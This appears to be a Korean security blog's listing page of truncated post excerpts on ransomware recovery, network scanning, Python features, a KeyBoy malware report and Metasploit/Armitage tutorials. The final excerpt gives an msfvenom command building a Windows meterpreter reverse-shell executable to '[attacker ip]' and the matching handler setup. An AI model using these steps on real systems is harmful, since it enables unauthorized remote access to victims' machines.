Lucete

랜섬웨어 걸리신 분들 한국 인터넷 진흥원에서 글을 읽어보아요:) 복구방법에 대해 설명되어있습니다.!! https://www.krcert.or.kr/ransomware/recovery.do

__ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhack..

netdiscover 같은 경우에는 기본적으로 backtrack 5 나 kali 에 있는 network tool이다. netdiscover은 active / passive scanner이다. 사용방법을 한번 알아보자 .기본적으로 netdiscover 만 입력해도 이렇게 뜨는 것을 알수있다.좀더 구체적으로 사용하기위해 netdiscover -h 를 입력하면 도움말이나오는데 -r 옵션을 이용하여 대역대를 설정해줄수도 있다.

1. f string formatting (PEP 498)You can avoid the inconvenience of having to kill variables when using the .format () method or%.>>> lang = 'Python' >>> author = 'Guido van Rossum' >>> 'Language: {}, Author: {}'.format(lang, author) Language: Python, Author: Guido van Rossum >>> f'Language: {lang}, Author: {author}' Language: Python, Author: Guido van Rossum 2. Type hint (PEP 484) In 3.5, type h..

모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다.다음은 service postgresql start 명령어를 실행시킨 후service metasploit start 를 실행해준다.다음은 armitage를 실행시킨다.이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면이러한 창이 뜬다.tab창에서 hosts -> add hosts 를 누르면이렇게 victim IP를 입력할 수있도록 뜬다.등록후 OS 를 알아보자 다시 host 탭에서 nmap scan -> quick scan(os detect)를 클릭하고 yes그럼 콘솔창에 이러한 것을 확인할수 있다.이제 취약점을 이용하여 공격하기 위해 어떠한 취약점을 이용할지..

hostname이란?연결된 장치의 이름을 말한다. 여기서 보면 parrotsec이란 것이 hostname 이다.hostname이란 명령어를 이용하여 일시적으로 변경이 가능하지만/etc/hostname에서 변경을 하여 바꿀 수 있다.두둥 :)

Key FindingsIn this report we track a malware operation targeting members of the Tibetan Parliament over August and October 2016.The operation uses known and patched exploits to deliver a custom backdoor known as KeyBoy.We analyze multiple versions of KeyBoy revealing a development cycle focused on avoiding basic antivirus detection.This operation is another example of a threat actor using “just..

모든 책임은 사용자 본인에게 있습니다.먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자.먼저 msfconsole을 입력한다.use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LPORT ..